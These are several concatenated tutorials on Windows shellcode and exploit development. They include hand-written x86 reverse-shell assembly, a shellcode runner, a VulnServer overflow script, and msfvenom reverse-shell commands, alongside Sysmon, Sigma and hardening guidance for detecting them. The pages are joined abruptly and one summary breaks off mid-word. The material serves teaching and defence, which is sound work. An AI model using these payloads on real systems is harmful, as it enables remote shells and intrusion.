; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop)
    ret

Every block in the skeleton corresponds to one of the rules established above: sub rsp, 0x28 for shadow + alignment, gs:[0x60] for the PEB, [rbx + 0x30] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.


10. Common Attacker Techniques

TechniqueDescription
PEB-walk API resolutionLocate kernel32.dll via gs:[0x60] chain, parse exports by hash
ROR-13 export hashingAvoid embedded API name strings; survive static signature scans
RIP-relative PIClea reg, [rel label] to address embedded data without fixups
Sub-register zero-extensionmov eax, imm32 to write RAX with no null bytes
Shadow-space-aware call wrappingsub rsp, 0x28 around every Win32 call from an unknown caller
Direct Win32 → Native API substitutionCall Nt* syscalls to bypass usermode hooks (T1106)
Reflective loading of a PE in memoryShellcode bootstraps a full PE image without touching disk (T1620)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

  • EventID 1 — Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
  • EventID 8CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
  • EventID 10ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (read + VM-write).
  • EventID 17 / 18 — Pipe creation/connection, frequently used by shellcode-launched implants for C2.

ETW providers worth subscribing to in EDR pipelines:

  • Microsoft-Windows-Kernel-Process — kernel-side process/thread/image events.
  • Microsoft-Windows-Threat-Intelligence (PPL-only) — NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx at the syscall layer, bypassed by no usermode hook.
  • Microsoft-Windows-Security-Auditing — handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

  • Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
  • CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
  • gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
  • ROR-13 hashing loops in memory scans.

Sigma sketch — suspicious cross-process access typical of shellcode injection:

title: Suspicious Cross-Process Access With VM-Write Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'
      - '0x1410'
      - '0x1010'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high

Hardening to deploy on monitored endpoints:

  • Arbitrary Code Guard (ACG) — denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
  • Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
  • Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
  • PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.


12. Tools for x64 Shellcode Analysis

ToolDescriptionLink
NASMAssembler for the snippets in this tutorial; emits raw binary for direct hex inspectionnasm.us
Keystone EngineProgrammatic assembler (Python bindings) for bad-character analysis labskeystone-engine.org
x64dbgUser-mode debugger; trace shellcode through gs:[0x60] and EAT walksx64dbg.com
WinDbgInspect _TEB, _PEB, _PEB_LDR_DATA, _LDR_DATA_TABLE_ENTRY on the target buildlearn.microsoft.com
Ghidra / IDAStatic analysis of shellcode-bearing samples and reflective loader stubsghidra-sre.org
Volatility 3Memory forensics: enumerate suspicious MEM_PRIVATE + RX regions, hunt unbacked threadsvolatilityfoundation.org
Process HackerLive triage of thread start addresses and memory protectionsprocesshacker.sourceforge.io
Godbolt Compiler ExplorerInspect MSVC-emitted x64 prologues to confirm ABI assumptionsgodbolt.org

13. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Process Injection (umbrella)T1055Sysmon EventID 8 + EventID 10 with VM-write GrantedAccess
DLL InjectionT1055.001Image Load (EventID 7) from MEM_PRIVATE-allocated path
Portable Executable InjectionT1055.002Volatility scans for PE headers in MEM_PRIVATE RX regions
APC InjectionT1055.004ETW Ti NtQueueApcThread to remote thread; alerted thread-start addresses
Process HollowingT1055.012EventID 1 with suspended child, followed by EventID 10 write + resume
Native APIT1106ETW Ti syscall provider; direct Nt* calls outside ntdll
Obfuscated Files or InformationT1027YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code LoadingT1620Unbacked RX memory with PE magic / no module image record

Summary

  • x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
  • The TEB is reached via gs:[0x60] on x64; every PEB offset (+0x18, +0x20, +0x30) differs from the x86 layout and must be verified against the target build.
  • Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
  • Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
  • Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

Related Tutorials

References

Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.


1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

ConstraintDescription
Position independentRuns at an unknown address; all references are stack-relative or computed
Null-free\x00 terminates strings in many injection vectors and truncates the payload
No importsAPI addresses must be resolved from loaded modules at runtime
Bad-char aware\x00, \x0a, \x0d and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.


2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

ConventionStack CleanupArgument OrderUsed By
stdcallCallee (ret N)Right-to-leftWin32 APIs (CreateProcessA, WSASocketA)
cdeclCallerRight-to-leftCRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.


3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the TEB at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. On Windows 7–11 x86 the load order is fixed: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences land on kernel32‘s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
    xor    eax, eax
    mov    eax, [fs:0x30]      ; TEB->ProcessEnvironmentBlock (PEB)
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4

Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address
Two FLink dereferences from the module list head land on kernel32.dll’s LDR entry; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash) ...
    inc    edx
    jmp    .next
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.


Diagram of PE export table structure showing how shellcode traverses from kernel32 base address through NT headers to the export directory and its three parallel arrays to resolve GetProcAddress
Shellcode walks three parallel export arrays — names, ordinals, and functions — to translate a name hash into the final virtual address of GetProcAddress.

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

Every API name is pushed as reversed dwords so it reads correctly in memory. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it seven times.


6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored network byte order (big-endian); 127.0.0.1:4444 becomes 0x0100007f and the packed family/port dword 0x5c110002.

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpCallee/QoS chain (NULLs)
    push   eax
    push   eax
    push   eax
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket
    push   edi                 ; hStdOutput = socket
    push   edi                 ; hStdInput  = socket
    times 9 push eax           ; zero lpReserved2..dwY (9 dwords)
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES
    times 4 push eax           ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
    push   0x44                ; cb = sizeof(STARTUPINFOA)
    mov    ebx, esp            ; ebx -> STARTUPINFOA

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>

Sequential flowchart of the full reverse shell execution chain from PEB walk through export parsing, Winsock initialisation, TCP connect, STARTUPINFOA setup, and final CreateProcessA call spawning cmd.exe
Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.

8. Null-Byte Elimination and Bad-Character Audit

A single \x00 mid-payload can truncate your shellcode. Design it out from the start.

Bad ByteNaive SourceNull-Free Replacement
\x00mov ecx, 0xor ecx, ecx
\x00 in stringpush 0x00657865 (“exe\0”)terminator from push eax after xor eax,eax
\x00 in mov al,0mov al, 0xor eax, eax then use al
\x0a / \x0dconstant containing CR/LFre-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eaxpush eax) keeps the " cmd.exe" string null-free, and the leading space the space-padded " cmd" introduces is tolerated by CreateProcessA‘s command-line parser. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin
#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.


10. Common Attacker Techniques

TechniqueDescription
PEB walkLocate kernel32.dll base with no imports via FS:[0x30]
Export hashingResolve APIs by name hash to stay small and null-free
Stack string buildingPush reversed dwords to stage " cmd.exe", ws2_32.dll, API names
STDIO redirectionPoint hStdInput/Output/Error at the socket for an interactive shell
Process injectionDeliver the blob via VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
RWX → RX stagingAllocate RW, copy, VirtualProtect to RX to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event IDNameWhat It Catches
1Process Createcmd.exe with an unexpected ParentImage / ParentCommandLine
3Network ConnectionOutbound TCP from cmd.exe or a non-browser binary (C2 connect-back)
8CreateRemoteThreadCross-process thread where SourceImageTargetImage
10ProcessAccessGrantedAccess to injected memory; CallTrace containing UNKNOWN
11FileCreateShellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

The canonical community Sigma rule for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high

Hardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block untrusted processes from removable media), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.


Hierarchy diagram mapping each shellcode execution stage to its corresponding detection telemetry source including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls
Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator — RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.

12. Tools for Shellcode Analysis

ToolDescriptionLink
NASMAssemble x86 to flat binarynasm.us
WinDbgStep the PEB walk and export parse livemicrosoft.com
x64dbgDynamic analysis of the loader and payloadx64dbg.com
GhidraStatic disassembly of extracted shellcodeghidra-sre.org
Radare2Lightweight disassembly and patchingradare.org
SysmonGenerate EID 1/3/8/10 detection telemetrymicrosoft.com
VolatilityMemory forensics — recover RWX regions and injected codevolatilityfoundation.org

13. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Command and Scripting Interpreter: Windows Command ShellT1059.003Sysmon EID 1 / 4688 cmd.exe spawn chain
Process InjectionT1055Sysmon EID 10 GrantedAccess + CallTrace UNKNOWN
Process Injection: DLL InjectionT1055.001Sysmon EID 7/8 on reflective-DLL delivery
Obfuscated Files or InformationT1027Null-free/encoded IP/port constants in the blob
Non-Application Layer ProtocolT1095Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web ProtocolsT1071.001Proxy/TLS inspection (contrast C2 transport)
System Information DiscoveryT1082PEB walk as in-memory module discovery
Native APIT1106Direct WSASocketA / CreateProcessA calls without framework APIs

Summary

  • A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
  • The PEB walk (FS:[0x30]LdrInMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
  • Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
  • Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
  • Det

Related Tutorials

References

Bad Characters, Null Bytes, and Restricted Character Sets

Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.


1. What Are Bad Characters? The Concept Explained

A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: corrupt, truncate, or transform the payload before it reaches EIP. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.

Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.

When you inspect memory after a crash, you are hunting for three distinct failure modes:

  • Missing bytes — characters stripped entirely by a sanitiser.
  • Altered bytes — characters transformed (e.g., \x80 appearing as \x01).
  • Premature termination — a byte that halts the copy, so nothing after it is written.

Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.


Flow diagram showing how a raw payload passes through a string API and produces three failure modes: missing bytes, altered bytes, and premature truncation before reaching the destination buffer
Three distinct ways a bad character corrupts a payload before it ever reaches the destination memory region.

2. Why \x00 Is Always the First Enemy

The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.

FunctionBehavior on \x00
strcpyStops copying at the first null
strncpyStops at null or n bytes
strlenReturns length up to first null
sprintfTerminates the formatted string
getsLegacy, present in old targets

At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.

Network contexts differ. A socket recv call reads a fixed byte count and will pass null bytes through the wire into the buffer. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.


3. Common Bad Characters by Protocol and Context

Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).

ByteHexReason
Null\x00String terminator — always bad in string overflows
Line Feed\x0ANewline — terminates input in many protocol parsers
Carriage Return\x0DCR — terminates input lines (HTTP, SMTP, POP3)
Space\x20Whitespace delimiter — terminates tokens in some parsers
Form Feed\xFFCauses issues in some parsing contexts

A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.


4. Building and Sending the Test Byte Array

The standard methodology: generate every non-null byte (\x01\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:

# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))

offset   = 2003                     # VulnServer TRUN EIP offset (illustrative)
buf      = b"A" * offset
buf     += b"B" * 4                 # EIP overwrite marker
buf     += bytes(badchar_test)      # byte array lands at ESP
buf     += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.send(b"TRUN /.:/" + buf)          # VulnServer TRUN command
s.close()

After the crash, the \x01\xFF block should appear contiguously in memory, typically at or near ESP.


5. Inspecting Memory: Immunity Debugger and mona.py

In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.

!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>
  • !mona config sets the output directory.
  • !mona bytearray -cpb "\x00" writes a reference bytearray.bin (all \x01\xFF) excluding the specified bad chars.
  • !mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.

Annotated mona output looks like:

[+] Comparing with memory at address 0x00ab1a30
    Only the first 18 bytes were identical
    Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...

6. Iterative Elimination: Narrowing the Bad List

Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.

If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:

BADCHARS = b"\x00\x0a\x0d"          # grows one confirmed byte per pass

full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)

# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.


Cyclic flow diagram of the iterative bad-character elimination process: generate byte array, send, crash and inspect, diff with mona, confirm bad byte, add to exclusion list, and repeat until the array is intact
Only the first byte of a corrupted run is confirmed bad — iterate the send-diff-eliminate loop until the full array survives intact in memory.

7. Encoding Shellcode with msfvenom

Once the bad-char set is known, generate shellcode that avoids it. msfvenom‘s -b flag specifies the forbidden bytes; it then picks an encoder — x86/shikata_ga_nai by default — to re-encode around them.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.

Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.

Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.


Hierarchy diagram showing how a known bad-character set feeds into msfvenom which selects between shikata_ga_nai as default, call4_dword_xor as fallback, and alpha_mixed for printable-only constraints, all producing encoded shellcode
msfvenom encoder selection is driven by the bad-char list — escalate through fallback encoders when the default cannot find a valid opcode permutation.

8. Alphanumeric and Printable-Only Constraints

When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode confined to the \x21\x7E printable range — ideal when the target only passes printable URI characters.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size — an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.


9. Instruction Substitution: Jumping Without Bad Opcodes

Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.

InstructionOpcode bytesNotes
JMP SHORT +6\xEB \x06\xEB often restricted
JE / JNE pair\x74 .. \x75 ..Two complementary branches always taken together
Near JMP\xE9 .. .. .. ..Alternative when \xEB is bad

A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:

    ; JMP SHORT replacement using complementary conditionals
    je  short target     ; 74 xx  -> jump if ZF=1
    jne short target     ; 75 xx  -> jump if ZF=0
    ; one branch is always taken; no \xEB byte present
target:
    ; decoder / shellcode continues here

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT to the handler stub — its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.


10. Unicode / Wide-Character Transformations

A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.

# You send:        \x41\x42
# Memory shows:    \x41\x00\x42\x00   <- every odd byte zeroed
sent     = b"\x41\x42"
observed = b"\x41\x00\x42\x00"        # Unicode expansion in the debugger

A naive \x01\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode — manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.


11. Common Attacker Techniques

TechniqueDescription
Bad-char enumerationInject \x01\xFF, diff memory, identify forbidden bytes
Shellcode encodingRe-encode with shikata_ga_nai / call4_dword_xor to avoid bad bytes
Alphanumeric shellcodealpha_mixed / Alpha2 for printable-only constraints
Jump substitutionReplace \xEB with JE/JNE pairs or near JMP
Venetian shellcodeSurvive Unicode expansion in wide-character buffers
Egghunter stagingSmall finder stub locating a larger payload in tight buffers

These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.


12. Defensive Strategies & Detection

Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.

Event IDNameRelevance
1Process CreationFrameworks (Metasploit, Empire) launching payloads
3Network ConnectionOutbound C2 from an exploited process
8CreateRemoteThreadPost-exploitation thread injection
10ProcessAccessCross-process open by injected payload
11FileCreateShellcode or payload dropped to disk

Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.

title: Shellcode Injection via Suspicious Process Access
logsource:
  category: process_access
  product: windows
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high

Additional telemetry and hardening:

